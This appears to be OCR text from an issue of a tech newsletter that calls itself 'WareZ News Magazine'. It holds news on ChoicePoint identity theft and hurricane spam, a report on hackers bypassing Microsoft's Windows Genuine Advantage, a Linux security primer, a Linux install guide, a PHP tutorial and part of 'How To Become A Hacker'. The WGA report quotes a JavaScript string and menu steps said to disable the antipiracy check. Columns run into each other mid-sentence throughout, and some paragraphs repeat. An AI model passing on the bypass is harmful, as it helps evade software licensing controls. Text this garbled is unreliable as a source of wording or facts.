years in prison if convicted of the new crimes.
Prosecutors believe 1,500 people were affected by the
so-called data theft with up to 150,000 others also at
risk.

"The 22-count grand jury indictment unsealed today


represents one of the largest cases of identity theft
ever prosecuted in Los Angeles County," said Los
Angeles County District Attorney Steve Cooley
speaking to Reuters.

In March SC reported consumer data-mining company


ChoicePoint had informed 35,000 Californians their
data could have been compromised, as part of the new
disclosure law Californian Senate Bill 1386.
A widespread spam campaign pretends to offer breaking
Over the next month a wave of industry and privacy
news about the hurricane, which struck the Gulf Coast
pressure forced the embattled company to reveal the
region earlier this week. The spam tries to lure users to a
full extent of the security breach. Eventually CEO
bogus website that could infect their PCs with malicious
Derek Smith apologized for his company's lack of
code, according to anti-virus supplier Sophos.
security to a House Energy and Commerce
Subcommittee.
"Once infected, the computer is under the control of the
remote criminal hackers who can use it to spy, steal or
According to reports, the U.S. government is
cause disruption," Gregg Mastoras, Sophos senior
widening its search for the culprits that targeted
security analyst, said in a statement.
ChoicePoint and there may soon be more arrests.
The SANS Internet Storm Center said users should also
watch out for fake emails and domains being used to
collect donations for hurricane victims.

In addition to getting money through fake foundations,


the fraudulent domains can steal user names and
passwords and lead users to install malicious software
on their PCs, according to a posting on the storm
center's site.
Hackers Crack Microsoft's Antipiracy
System
Windows Genuine Advantage system first exploited within 24 hours of its launch.

Microsoft says that hackers managed to bypass a process Easy Hack?


it had implemented several days ago to ensure that users
of Microsoft's update services possessed legitimate The Boing Boing hack is not the only way to get around
copies of Windows before they could download updates WGA's restrictions.
and content from those services.
David Keller, founder of PC consulting and services
A posting on the Boing Boing blog claimed that a
firm Compu-Doctor in Cape Coral, Florida, was able to
JavaScript command string could bypass a check that
change his Internet Explorer settings to bypass WGA
Microsoft instituted Wednesday through the Windows when he ran into a flaw in the program that flagged a
Genuine Advantage 1.0 program. legitimate product key on a customer's Windows XP
Professional Service Pack 2 as invalid.
According to the posting, users can override the WGA
by pasting the string
"The customer was the original owner, no hardware was
javascript:void(window.g_sDisableWGACheck='all') in changed since purchase, nor was Windows ever
the address bar of their browser and pressing Enter. The
reinstalled on the system," Keller said in an e-mail to the
code "turns off the trigger for the key check," according IDG News Service. WGA had rejected the operating
to the blog posting. system, nevertheless, thereby preventing Windows
Update from working, he said.
Quick Work

The WGA program requires users to run a program


verifying that their Windows operating system is not
pirated, before they can use Microsoft's software update
services. Microsoft had been running it as a pilot
program since September 2004 but made the validation
system a requirement just last Wednesday.
Keller wrote that he did not have much luck with
A Microsoft spokesperson conceded on Friday that Microsoft support technicians, so he found a way to
hackers had indeed succeeded in cracking the WGA bypass the validation process on his own and moved
program, but said that the software giant will fix the along with the update. He accomplished this by
flaw they exploited in an upcoming version of the WGA disabling the Windows Genuine Advantage add-on
program. within his browser's Internet Options. By clicking on
Tools/Internet Options/Programs/Manage Add-ons,
The exploit came soon after Wednesday's launch of the Keller disabled the WGA add-on. He then exited
program, the spokesman said. "Within 24 hours, hackers Internet Explorer and was able to do a Windows Update
claimed to have circumvented the process and it appears without completing the validation step.
that they did," he said. "This is a hack that exploits a
feature that enables repeat downloads in the same
session so that a hacker never has to validate as a
genuine user," he said. Source:

The move to lock out pirated copies of Windows from


the update sites is part of Microsoft's effort to fight
software piracy, a major issue for the software vendor.
The Basics of Linux Network Security

Introduction Linux as a server offers all kinds of facilities like ftp,


WWW, and mail. The way that it handles many of these
The Internet has become a hazardous place, in the last few services is via a system of ports. Port 21 controls ftp, for
Averting
years. As the Break-Ins
traffic increases and more important example. (If you are interested, the mapping of port
transactions are taking place your risk grows as bad guys numbers to service names is in the file /etc/services.)
try to damage, intercept, steal or alter your data.
To save on system resources and make system
If there is something worth stealing then someone will try administration less complex, many services are handled
and steal it. Linux-based systems have no special through a configuration file /etc/inetd.conf. This file
exclusion from this universal rule. A primary reason that tells the system how to run each of the available
Linux systems are so popular is because they are robust services.
and have many sophisticated security measures.
Many Linux vendors turn on various services in
As the manager of a Linux system for your department or inetd.conf by default when for maximum security they
small business, you might feel a bit daunted by all of these should be off! In many corporate environments security
threats. You've heard Linux is supposed to be secure, but as such is not an issue. If there is enough security to
how do you make sure? prevent accidental damage in these 'soft' environments
providing access to these services is more important
than preventing them. If your Linux host is exposed to
It is a truism, of course, that if you don't use the Linux
the Internet you may hold a different point of view
security tools provided, then you should be ready for the
though. To check what services are currently running on
inevitable break-in. Problems can also be caused by badly
your Linux system, type the command
implemented security measures. Securing a Linux machine
can get pretty complicated and entire shelves of books
have been dedicated to the subject. netstat -vat

You may not have the time or the motivation to delve into
all of those tomes, so we're going to make this a bit This will print up something like this
simpler.
tcp 0 0 *:6000 *:* LISTEN
There are several methods remote attackers can use to tcp 0 0 *:www *:* LISTEN
break into your machine. Usually they are exploiting tcp 0 0 *:auth *:* LISTEN
problems with existing programs. The Linux community tcp 0 0 *:finger *:* LISTEN
always quickly spots these 'exploits' and releases a fix. tcp 0 0 *:shell *:* LISTEN
Linux fixes are usually out long before the equivalent tcp 0 0 *:sunrpc *:* LISTEN
programs in other operating systems are mended. The
issue here though is how to prevent your machine from Each line that says LISTEN is a service waiting for
suffering any sort of problem of this sort. connections.
Some of these services run as stand-alone programs, but
There are several methods remote attackers can use to many of them are controlled by /etc/inetd.conf. If you
break into your machine. Usually they are exploiting are not sure what a service does, look it up in
problems with existing programs. The Linux community /etc/inetd.conf. For instance, if you type
always quickly spots these 'exploits' and releases a fix.
Linux fixes are usually out long before the equivalent grep '^finger' /etc/inetd.conf
programs in other operating systems are mended. The
issue here though is how to prevent your machine from you will get back a line from inetd.conf like this
suffering any sort of problem of this sort.
finger stream tcp nowait nobody /usr/sbin/tcpd
/usr/sbin/in.fingerd
To see what the program does, look up in.fingerd in the man
page. If you think you can live without this service, then it Ssh is a stable, well-developed system with open
can be turned off in /etc/inetd.conf. By commenting out the source that provides encryption and authentication on
line (put a # at the start of the line) and then issuing the connections. Encryption is using codes to protect the
command kill all -HUP inetd you can immediately and packets of data while in transit. Authentication is a
permanently turn a service off. There is no need to reboot. process for verifying if a.packet of data or a
connection is valid. There are ssh clients for most
If a service is not listed in /etc/inetd.conf then it probably other operating systems too. By using Linux as a
runs as a stand-alone program. server you can provide ssh level security for all your
network use.
You can remove a service provided by a stand-alone
background program by uninstalling its package. Only do
this if you are sure about what the program does and are
certain that it is not necessary.

Monitoring Programs and Where/What They Log

Linux has a comprehensive set of subsystems to let


the systems administrator know what is going on with
his or her system. All manner of log files are generally
kept in the /var/log directory. Most of the standard
services log information to /var/log/syslog and
/var/log/messages about users connecting to them or
attempting to connect. There are also log files for such
services as apache (/var/log/httpd/access_log), mail
(/var/log/mail) and firewall (/var/log/firewall).

The main problem with logging events is that one


tends to end up with too much data. So careful
filtering and only logging important information is
Keep Out The Prying Eyes With Ssh (Secure Shell important.
System)
There are some good tools out there that will make
To add extra security to the various services, Linux has a this work easier.
system for allowing and denying them to chosen hosts. For
instance, you may wish to allow logins from machines at
Ethereal is a packet sniffer. With it you can capture
your own site, but not from the Internet. The files
various types of packets over a given period of time. It
/etc/hosts.allow and /etc/hosts.deny list allowed services and
also shows all manner of information about the
hosts.
packets. It's useful for watching packets coming into
The method of denying connections by checking the host
and going out of your machine. Generally it will
provides a good basic method for throwing off attacks. But it
detect traffic on your network segment.
is not the end of the story. It is possible to fake host names
on incoming connections ( oh yes it is ). While data is in
transit between programs over the Internet it is also in
danger. Anyone with the knowledge can look at your data.
Using a method known as 'spoofing' they can even inject
fake data into a legitimate stream. These problems come
about because of the way that Internet protocols interact. To
overcome these difficulties ssh was devised.
Monitoring Programs and Where/What They Log
Stop The Evil Forces Of The Internet With Firewalls

A firewall is a device that protects a private network from


the wider Internet. The simplest form of firewall is a Linux
machine with one network connection ( an Ethernet card
or modem ) connected to the Internet and the other
connected to the private network. The Firewall computer
can reach the protected network and the Internet. This
traffic between the protected network and the Internet is
controlled, in both directions by a list of rules. These rules
can be customized for your needs. CoyoteLinux.com has a
firewall system that fits on a floppy and doesn't need a
Linux has a comprehensive set of subsystems to let the hard disk to run. It's design specifically to address the need
systems administrator know what is going on with his or her for an easy to install no-nonsense Linux firewall.
system. All manner of log files are generally kept in the You might take a look at running a hardware firewall
/var/log directory. Most of the standard services log appliance. These devices are small routers or switches that
information to /var/log/syslog and /var/log/messages about have built-in firewalls. They generally allow limited setup
users connecting to them or attempting to connect. There are of rules to allow packets to pass back and forth. They don't
also log files for such services as apache provide as much flexibility for rules as dedicated Linux
(/var/log/httpd/access_log), mail (/var/log/mail) and firewall firewalls. Usually the availability is good with some even
(/var/log/firewall). being equipped with four or more RJ-45 ports and a
The main problem with logging events is that one tends to wireless access point, all for around $100.
end up with too much data. So careful filtering and only
logging important information is important. All data flowing to and from the Internet and the private
There are some good tools out there that will make this work network is filtered by the firewall. Inside the private
easier. network less care needs to be taken with turning off
services and the like. It is a way of concentrating effort on
Ethereal is a packet sniffer. With it you can capture various making one machine secure and protecting many others in
types of packets over a given period of time. It also shows all the process. The methods for correctly setting up firewalls
manner of information about the packets. It's useful for are quite complex. First you have to configure your
watching packets coming into and going out of your machine for two Ethernet cards. Then you have to use the
machine. Generally it will detect traffic on your network IP-chains/IP-tables software to set up filters which connect
segment. the two Ethernet cards data links.

Another logging/intrusion detection type tool is called The main drawback with making your systems more
Tripwire. It takes a snapshot of your important system files secure is that they become less accessible. The idea behind
and records their signature in a database. Various signature ramping up your system's security is to stop use of your
levels are available from mild to wild. You can also set the computers, by crooks, thieves and malcontents. Before
rules in a policy file to tell Tripwire what to check. After the implementing any of the ideas in this article you should
database is initialized and signed Tripwire can be executed consider carefully the opposite side of the coin: the
whenever you need to check the integrity of your system. systems are there to be used by your users! Linux has a
The report will point out when your files are changed and the wide range of security tools and by carefully combining
severity of the security risk. The Tripwire report is pretty various techniques and programs, you should be able to
easy to read and can be customized according to your file come up with a good balance between ready access and
tracking needs. Why not set Tripwire up to run every day, system security.
early in the morning and have a report ready to look at, with
your first cup of coffee?

A popular program for detecting access attempts (via the


network) and port scans is Snort. The program produces files
that log these types of activities and even gives some idea of
where to find out more information. Of course, then you
have the same problem as with other log files. It gets tough
for a busy system administrator to review all the log files on
a regular basis.
My First Linux Server, Part 1
Easy Linux, Easy Step 1: Buy CDs, Please
Linux is set up for CD-ROM installation. Of course,
you can download your Linux software from many
Many small businesses are turning to Linux as way to swim free sources and burn your own CDs. But the
against the tide of rising software costs. Are you thinking about download is big--up to 3 GBs--and it takes time to
diving into Linux for your small business? From the outside, burn a full set of CDs. Do it the easy way and
Linux can appear to be a deep ocean of strange jargon in eliminate problems with interrupted downloads or CD
unchartered waters. Who has the time to wade through all that data errors.
to save a few clams? With Linux, it's not a sink or swim Go to eBay and buy good quality CDs from
proposition. established sellers like "The Linux Store" and pay
about $1.00 per CD, plus shipping. Or go to Linux CD
Linux is now a lot simpler than you may think. We can provide and pay about $2.00 a CD plus shipping. You might
you with the easiest, simplest, no-problem process for have to look carefully to find RedHat here.
installing Linux on a PC. After going through this simple At such inexpensive prices, the vendor is making no
installation process, you will have a basic machine that you can money, so you do not qualify for free vendor support.
configure into any kind of server, workstation, or office These are low-end products, but they do contain all
desktop. Future articles in this My First Linux Server series the small business server and office software you need
will help you build productive, Linux-based servers and small to get started. If you need or want someone to call on
office workstations. in case of technical difficulties, pay more and buy
from Red Hat, SUSE, or other established Linux
vendors.
The best choices for your first Linux machine are probably the
popular Red Hat Linux or SUSE Linux, primarily because both Step 2: Prepare the Box
are easy to install and configure. Additionally, these companies Any leftover, surplus, outmoded, underpowered PC is
are sound choices for the home office or small business. Both perfect for your first Linux server project. Linux runs
vendors have specialized in Linux for many years and offer full on any Intel 386, 486, Pentium (called i586), Pentium
corporate product lines supporting your expansion. II (called i686) and newer platforms, as well as many
other CPUs. 128 MB RAM is quite adequate for a test
Red Hat, for example, has an extensive library of recent third- system, and you will need around 10GB of hard disk
party English documentation, while SUSE is better space. The purpose of this exercise is to quickly build
documented in European languages. (As recently announced, a Linux platform and then learn the basics of
Red Hat has discontinued support for Red Hat Linux 9.0, so configuring a useful small business server. Then you
security updates will no longer be available. But you can still can repeat the process on larger, faster platforms for
learn the basics with version 9.0 and you can upgrade to go into heavy server production.
supported versions when you need a more secure production While you wait for the CD shipment to arrive, it is
system.) well worth it to clean up the PC as much as possible.
You can keep Windows applications intact if you
wish, and you will be able to use this computer for
both Windows and Linux. Minimize the Windows
footprint on the system by removing all unnecessary
applications and files, and back up any files you might
need later. Clean up the registry, defragment the disks
and run a careful virus scan.
Also note that you may need Linux drivers for some
of the cards and devices you have installed, so make a
paper list of manufacturers and model numbers of all
of the cards, CD drives, hard disks and motherboard.
(Note that a driver is just a small piece of software
that links the operating system to other devices such
as printers and hard disks). The Linux CDs probably
have the correct drivers for these devices, but if you
need to search for a Linux driver, the list comes in
handy.
The Linux installation starts by booting from a CD, so the CD- Step 4: Feed CDs and Enjoy
ROM drive must be the first boot source your computer looks for.
This may entail changing some settings in what is called the There is no user interaction for these CDs--just
BIOS—Basic Input/Output System--this can be likened in some insert the next CD and go do something more
ways to the starter motor in a car. The BIOS is what makes a productive than watching software copying. After
turned off computer come to life. Go into the BIOS settings and all of the applications load, the installer program
change the boot sequence to put the CD-ROM drive first. It may takes you through a few easy configuration screens.
sound complex, but it is relatively simple. If this gives you any Finally, the system reboots and brings up the boot
trouble, any somewhat technically inclined associate should be selection screen. If you selected Linux to be the
able to sort it out for you in 30 seconds. default OS; the new login screen automatically
appears.
Step 3: Install First CD
Congratulations, Linux is live! Take some time to
Load up the Linux! Place the first Linux CD in the drive and get familiar with the new look and layout of a Linux
reboot the computer. When the screen comes up, you know Linux system. Explore the configuration tools, and surf the
has found drivers for your monitor, video board, and keyboard. Linux sites. The adventure begins.
The installer program sequences are different for each vendor,
but SUSE and Red Hat give you a workable system if you choose
In the second article in this series next week, we
the default settings and keep it simple. Later, after some
will configure the PC to perform as simple file
experience, you can optimize the system for workstation or server
server suitable for home office and small business
use.
networks.
Step through the screens and selections, taking the default
settings and simplest choices. Read the Help text for each screen
to get familiar with configurations. The keys to keeping things
simple are:

• Accept default selections when in doubt


• Install all the software

Points to watch for Red Hat: Choose "Custom" to allow installing


all software, but when you see the Disk Partitioning Setup screen,
be sure to choose "Automatic Partition." Points to watch for
SUSE: Accept the disk-partitioning proposal. For software
selection, choose "Detailed Selection" and select all software.
And please, remember to write down your IDs and passwords,
because it is not easy for the novice to re-set them.
There is a final choice of whether to proceed with the installation
or cancel it. Until this point, nothing has been written to disk, and Look out for future issues of WareZ News
you can cancel out of the installation without changing the disks Magazine to learn more about linux!
in any way. You can cancel right now and go back through the
installation again, choosing different options. When you finally
summon the courage to make that last click, the disk partitioning
and data writes begin. The installer program does an automatic
reboot and then requests the remaining CDs to finish the install
process.
The easy way to learn PHP
-part 1 –

What is PHP? PHP has been used to create shopping carts, address
books, photo galleries, contact lists, catalogs, user
PHP is an interpretted language that has similarities to C. PHP forums, and many other types of content on the
scripts are written and typically saved with a file extension of web. The uses of PHP are endless. Since PHP can
.php . These PHP scripts can be run by a webserver (i.e. also be run from the command-line, it is possible to
MicroSoft Internet Information Services or Apache) for use on use PHP to do server administrative tasks, or run
a web page, or from the command line if PHP is configured PHP scripts from cronjobs.
this way.
PHP Examples
An example of PHP in use is on this webpage. If you look at To give you an idea of what the PHP language
the URL address of this page, you will notice the following: looks like, as mentioned, it looks similar to C, as it
requires a semi-colon to close each command line
www.vcvtech.com/index.php of code. The characters (together they're called a
tag) open and close your PHP script, which may be
The file, index.php, is a PHP script that helps serve the pages contained in a text file by itself, or in the middle of
of the website. some HTML code. These tags tell the web server to
begin translating PHP code. An example of PHP is
listed below:
What do I need to program with PHP?
<? echo "Hello World";?>
The example script above, if it were saved in a file
In order to program with PHP, you will need a good text editor and called upon by the webserver, it would display
- preferably one that recognizes when PHP code is being "Hello World" on an otherwise blank page.
typed. These 'PHP aware' editors allow for the user to easily if...Then statements look like the following:
distinguish between PHP code, and other types of code, such as <?
Javascript or HTML, typically by color coding and bolding the $flag = $_POST["answer"];
text of each type, differently. A good example of a freeware if($flag==true) {
editor is HTML-Kit (www.chami.com), which was used for a echo "It is TRUE!!!";
majority of the programming work on this website. } else {
It is also recommended that you have access to PHP by echo "It is absolutely, FALSE!!! Get out of here
installing it with a webserver, either on a Linux system, or a and don't come back till it is TRUE!!!";
MicroSoft Windows-based workstation. Better yet, use a web }
hosting provider that provides PHP as one of its services with it ?>
web hosting package. It is easy and useful to learn PHP in The above example leaned a bit toward the dramatic
conjunction with MySQL, and Apache or IIS, which is side, but illustrates how closely PHP resembles C.
typically available with web hosting services. It is of the author's opinion that if a programmer is
proficient in C, of which many of PHP's commands
are copies of, then PHP should be easy to learn by
that programmer. Otherwise, PHP is still a good
language to learn, but it is advised that as one first
begins to learn PHP, that he or she has a good tutor
or book to refer to in order to avoid getting
What kind of programs can I create with PHP? into bad habits, such as creating spaghetti code
that lumps all of a programs functionality into one
PHP is typically used in conjunction with a web server and a long script, instead of segregating it into seperate,
database, such as Apache (www.apache.org) and MySQL re-usable functions. The topic of PHP writing style
(www.mysql.org), in order to assist in displaying dynamic web is beyond the scope of this article, but will be
pages. covered in another tutorial.
What other resources are available to learn
PHP? PHP Variables

The web is full of resources to be looked up to learn The syntax used for variables in PHP requires
programming PHP. PHP's official site, www.php.net has a that variable names be preceeded by a dollar
searchable index of all of PHP's commands, and there are sign($). Variable names can start with a letter or
dicussions posted with each command, that give further underscore, and may have numbers,letters, or
details and examples of the command's usage. Other underscores, following. Variable names in PHP
websites worth taking a look at include the following: are case sensitive – an important point to
remember if you’re modifying some PHP code.
www.devshed.com
Variables are assigned values by using the ‘equal’
www.w3schools.com sign – a standard practice in most common
programming languages. For example, to set $a
to equal ‘5’:
www.php-scripts.com
$a = ‘5’;
www.phpbuddy.com
We may set $b to equal 5.
www.webmonkey.com
$b= 5;
This list should be enough to get you started.
PHP decides the type of variable depending upon
the value that is being assigned. Addition of $a +
$b results in an error. However, if you are
performing a string function, such as
concactenation, PHP automatically converts
numeric variables to strings.

Concactenation within PHP is simple, as it only


requires a period(.) between the strings being
concactenated. For example:

$string = $a.” + “.$b;

A string may also be concactenated using the


following convention:
The Basics of PHP
$string .= $a;
In order to use PHP, you must learn some basic syntax of
how PHP is used. This article is not a beginner’s guide to
programming. It is assumed that the reader has some $string .= “ is the value of a”;
previous programming experience with other languages such
as BASIC, C, or Fortran. Nonetheless, it may be possible for A numeric variable may be similarly be
the quick learner to learn incremented as demonstrated:
how to program with PHP, by reading and utilizing
examples. $number++;

or use

$number+=$b;
Finally, it should be mentioned that PHP variables may be set Notice that print_r displays the key value of the
to values, or references to other variables that are already set array followed by the value itself (i.e. the key
with values. These are considered reference variables, similar value of 0, is between the brackets, listed as [0]).
to those used in the C language, in which the variable doesn’t It is interesting to note that PHP arrays can have
actually contain the value of the variable it is pointing to, but it key values that are non-numeric. For example,
is only JUST a pointer or reference. You can also consider it you can set the following array:
an alias of the variable, as a another means to describe it. By
using reference variables, such as when pointing to an array or $my_new_array[‘test’] = “this is a test”;
a object (objects will be discussed in another tutorial), the
whole array or object doesn’t have to be copied again – rather
If you do a print_r, you will see that [‘test’]
the reference variable points at the variable’s location in
appears as a key value. One of the greatest
memory (Remember, it is memory, typically RAM, that
attributes of PHP is that it allows you to create
contains all your variables, besides your PHP code when you
keys from words so that your keys can have
run your PHP script!).
descriptive meanings or be more easily linked to
fields in a database or from $_POST data from a
PHP Arrays form.

PHP arrays are used very similarly to those in BASIC, except If you use closed brackets after your array names,
you do not need to dimension them in advance. PHP also and do not specify a key value when inserting
provides an immense number of array functions, that provide values into the array, you should be aware of the
great power to their usage. Volumes could be written on the pitfalls you may encounter. PHP Array pitfalls
various uses of PHP arrays, but it is probably better to will be covered in the next chapter.
reference www.php.net/arrays to gather more information on
more complex topics of arrays, that will not be covered in this
PHP Array Pitfalls To Avoid
basic tutorial.
PHP arrays are already set to receive an infinite number of I was helping an up an coming PHP developer at
items. The syntax for setting your PHP array is as follows: the office the other day - it happened to be his
birthday and he was in a hurry to leave for a
$my_array[0] = “This is a test”; dinner engagement with his family.
Unfortunately, he was wrestling with PHP and its
handling of arrays. I recognized the problem
Interestingly, values may be appended to this array by using
immediately, recounting my own experiences
two closed, empty brackets as shown by the following:
with getting $_POST data from a form with
$my_array[] = “This is another test”;
checkboxes and several text input fields, and
$my_array[]=”Hey Mom, isn’t this cool?!”;
expecting the data to line up perfectly with some
corresponding data from a MySQL database.
PHP will append a value to the next available slot of your
array. PHP maintains an index of each array. The reason he was experiencing a problem was
that as he was having data input into a form on
his website into an HTML array variable called
A useful function to view the contents of an array is print_r, as
data[] , he was hoping that the 3rd instance of the
seen below:
field on his form would also be put into the 3rd
slot of his PHP array, which he called
print_r($my_array); $formdata[] .
Unfortunately, when you have a closed bracket
Output:
array, items are added to the next available
indexed key value of the array. This is true for
$my_array Array( [0]=>”This is a test”;[1]=>”This is both HTML and PHP. Thus, if he had 3 fields on
another test”;[2]=>”Hey Mom, isn’t this cool?!”;) his form using data[], and when the HTML is
displayed in the browser, the user fills in the 3rd
field on the form, data[0] will contain the value -
not data[3]. Therefore, if you want to retrieve
data from a form with array variables, it is better
to specify the key each array.
An example in which an array would be used on a form and
then used by PHP is listed below, in which we have an online
quiz form. PHP IF... THEN Statements
<HTML>
<BODY> To use IF..THEN.. and ELSE within PHP, the
<FORM name="form" method="post" following example is provided, in which we will
action="process.php"> test to see if a variable $flag is set to TRUE.
<H4>What is my favorite food(s)? (Check all that
apply)</H4> if ($flag == TRUE) {
<a>Cheeseburger? A.<input name="answers[A]" echo “The flag is set to TRUE”;
type="checkbox"></a><BR> } else {
<a>Hot Dots? B.<input name="answers[B]" echo “The flag is not set to
type="checkbox"></a><BR> TRUE”;
<a>Tacos? C.<input name="answers[C]" }
type="checkbox"></a><BR>
<a>Chicken? D.<input name="answers[D]" Notice that we used a double equal sign as a
type="checkbox"></a><BR> comparison operator. PHP requires this syntax as it
<button type="submit">Submit</button> would consider $flag=TRUE to mean that we’re
</FORM> trying to set the variable instead of performing a
</BODY> condition. For more information on PHP’s
<HTML> comparison operators, click here to reach the
The PHP script that retrieves and processes the information is ‘comparison operator’ section of the PHP manual at
below: www.php.net.
<?
$correct_answers_array = array("A","B");
$answerstring=implode(",",$correct_answers_array); More in the next issue!
$correct_flag= true;
$posted_answers = $_POST['answers'];
foreach($posted_answers as $key=>$value) {
if ($correct_flag != False ) {
$correct_flag = True;
}
if (!in_array($key,$correct_answers_array )) {
$correct_flag = false;
echo "false";
} else {
unset($posted_answers['$key']);
}
}
if ($correct_flag==True and
count($_POST['answers'])==count($correct_answers_arra
y)) {
echo "YOU 100% RIGHT!<br>";
} else {
echo "You were not 100% correct…I’m very
disappointed in you.<BR>";
echo "The correct answer should have been
".$answerstring.".<BR>";
} ?>
How To Become A Hacker
What Is a Hacker? The basic difference is this: hackers build things,
crackers break them.
The Jargon File contains a bunch of definitions
of the term "hacker", most having to do with If you want to be a hacker, keep reading. If you
technical adeptness and a delight in solving want to be a cracker, go read the alt.2600
problems and overcoming limits. If you want to newsgroup and get ready to do five to ten in the
know how to become a hacker, though, only two slammer after finding out you aren't as smart as
are really relevant. you think you are. And that's all I'm going to say
about crackers.
There is a community, a shared culture, of expert
programmers and networking wizards that traces The Hacker Attitude
its history back through decades to the first time-
sharing minicomputers and the earliest ARPAnet Hackers solve problems and build things, and
experiments. The members of this culture they believe in freedom and voluntary mutual
originated the term 'hacker'. Hackers built the help. To be accepted as a hacker, you have to
Internet. Hackers made the Unix operating behave as though you have this kind of attitude
system what it is today. Hackers run Usenet. yourself. And to behave as though you have the
Hackers make the World Wide Web work. If you attitude, you have to really believe the attitude.
are part of this culture, if you have contributed to
it and other people in it know who you are and
But if you think of cultivating hacker attitudes as
call you a hacker, you're a hacker. just a way to gain acceptance in the culture,
you'll miss the point. Becoming the kind of
The hacker mind-set is not confined to this person who believes these things is important for
software-hacker culture. There are people who you --- for helping you learn and keeping you
apply the hacker attitude to other things, like motivated. As with all creative arts, the most
electronics or music --- actually, you can find it effective way to become a master is to imitate
at the highest levels of any science or art. the mind-set of masters --- not just intellectually
Software hackers recognize these kindred spirits but emotionally as well.
elsewhere and may call them 'hackers' too --- and
some claim that the hacker nature is really Or, as the following modern Zen poem has it:
independent of the particular medium the hacker
works in. But in the rest of this document we
will focus on the skills and attitudes of software
hackers, and the traditions of the shared culture To follow the path:
that originated the term 'hacker'. look to the master,
follow the master,
walk with the master,
There is another group of people who loudly call see through the master,
themselves hackers, but aren't. These are people
become the master.
(mainly adolescent males) who get a kick out of
breaking into computers and phreaking the
phone system. Real hackers call these people So, if you want to be a hacker, repeat the
'crackers' and want nothing to do with them. Real following things until you believe them:
hackers mostly think crackers are lazy,
irresponsible, and not very bright, and object that 1. The world is full of fascinating
being able to break security doesn't make you a problems waiting to be solved.
hacker any more than being able to hotwire cars
makes you an automotive engineer.
Being a hacker is lots of fun, but it's a kind of
Unfortunately, many journalists and writers have
fun that takes lots of effort. The effort takes
been fooled into using the word 'hacker' to
motivation. Successful athletes get their
describe crackers; this irritates real hackers no
motivation from a kind of physical delight in
end.
making their bodies perform, in pushing
themselves past their own physical limits. To behave like a hacker, you have to believe this
Similarly, to be a hacker you have to get a basic enough to want to automate away the boring bits
thrill from solving problems, sharpening your as much as possible, not just for yourself but for
skills, and exercising your intelligence. everybody else (especially other hackers).

If you aren't the kind of person that feels this (There is one apparent exception to this. Hackers
way naturally, you'll need to become one in will sometimes do things that may seem
order to make it as a hacker. Otherwise you'll repetitive or boring to an observer as a mind-
find your hacking energy is sapped by clearing exercise, or in order to acquire a skill or
distractions like sex, money, and social approval. have some particular kind of experience you
can't have otherwise. But this is by choice ---
You also have to develop a kind of faith in your nobody who can think should ever be forced into
own learning capacity --- a belief that even a situation that bores them.)
though you may not know all of what you need
to solve a problem, if you tackle just a piece of it 4. Freedom is good.
and learn from that, you'll learn enough to solve
the next piece --- and so on, until you're done.)2. Hackers are naturally anti-authoritarian. Anyone
No problem should ever have to be solved who can give you orders can stop you from
twice. solving whatever problem you're being
fascinated by --- and, given the way authoritarian
Creative brains are a valuable, limited resource. minds work, will generally find some appallingly
They shouldn't be wasted on re-inventing the stupid reason to do so. So the authoritarian
wheel when there are so many fascinating new attitude has to be fought wherever you find it,
problems waiting out there. lest it smother you and other hackers.

To behave like a hacker, you have to believe that (This isn't the same as fighting all authority.
the thinking time of other hackers is precious -- Children need to be guided and criminals
so much so that it's almost a moral duty for you restrained. A hacker may agree to accept some
to share information, solve problems and then kinds of authority in order to get something he
give the solutions away just so other hackers can wants more than the time he spends following
solve new problems instead of having to orders. But that's a limited, conscious bargain;
perpetually re-address old ones. the kind of personal surrender authoritarians
want is not on offer.)
(You don't have to believe that you're obligated
to give all your creative product away, though Authoritarians thrive on censorship and secrecy.
the hackers that do are the ones that get most And they distrust voluntary cooperation and
respect from other hackers. It's consistent with information-sharing --- they only like
hacker values to sell enough of it to keep you in 'cooperation' that they control. So to behave like
food and rent and computers. It's fine to use your a hacker, you have to develop an instinctive
hacking skills to support a family or even get hostility to censorship, secrecy, and the use of
rich, as long as you don't forget your loyalty to force or deception to compel responsible adults.
your art and your fellow hackers while doing it.) And you have to be willing to act on that belief.

3. Boredom and drudgery are evil. 5. Attitude is no substitute for


competence.
Hackers (and creative people in general) should
never be bored or have to drudge at stupid To be a hacker, you have to develop some of
repetitive work, because when this happens it these attitudes. But copping an attitude alone
means they aren't doing what only they can do -- won't make you a hacker, any more than it will
- solve new problems. This wastefulness hurts make you a champion athlete or a rock star.
everybody. Therefore boredom and drudgery are Becoming a hacker will take intelligence,
not just unpleasant but actually evil. practice, dedication, and hard work.
Therefore, you have to learn to distrust attitude language. To be a real hacker, you need to get to
and respect competence of every kind. Hackers the point where you can learn a new language in
won't let posers waste their time, but they days by relating what's in the manual to what
worship competence --- especially competence at you already know. This means you should learn
hacking, but competence at anything is good. several very different languages.
Competence at demanding skills that few can
master is especially good, and competence at If you get into serious programming, you will
demanding skills that involve mental acuteness, have to learn C, the core language of Unix. C++
craft, and concentration is best. is very closely related to C; if you know one,
learning the other will not be difficult. Neither
If you revere competence, you'll enjoy language is a good one to try learning as your
developing it in yourself --- the hard work and first, however. And, actually, the more you can
dedication will become a kind of intense play avoid programming in C the more productive
rather than drudgery. That attitude is vital to you will be.
becoming a hacker.
C is very efficient, and very sparing of your
Basic Hacking Skills machine's resources. Unfortunately, C gets that
efficiency by requiring you to do a lot of low-
The hacker attitude is vital, but skills are even level management of resources (like memory) by
more vital. Attitude is no substitute for hand. All that low-level code is complex and
competence, and there's a certain basic toolkit of bug-prone, and will soak up huge amounts of
skills which you have to have before any hacker your time on debugging. With today's machines
will dream of calling you one. as powerful as they are, this is usually a bad
tradeoff --- it's smarter to use a language that
uses the machine's time less efficiently, but your
This toolkit changes slowly over time as time much more efficiently. Thus, Python.
technology creates new skills and makes old
ones obsolete. For example, it used to include
programming in machine language, and didn't Other languages of particular importance to
until recently involve HTML. But right now it hackers include Perl and LISP. Perl is worth
pretty clearly includes the following: learning for practical reasons; it's very widely
used for active web pages and system
administration, so that even if you never write
1. Learn how to program. Perl you should learn to read it. Many people use
Perl in the way I suggest you should use Python,
This, of course, is the fundamental hacking skill. to avoid C programming on jobs that don't
If you don't know any computer languages, I require C's machine efficiency. You will need to
recommend starting with Python. It is cleanly be able to understand their code.
designed, well documented, and relatively kind
to beginners. Despite being a good first LISP is worth learning for a different reason ---
language, it is not just a toy; it is very powerful the profound enlightenment experience you will
and flexible and well suited for large projects. I have when you finally get it. That experience
have written a more detailed evaluation of will make you a better programmer for the rest of
Python. Good tutorials are available at the your days, even if you never actually use LISP
Python web site. itself a lot. (You can get some beginning
experience with LISP fairly easily by writing and
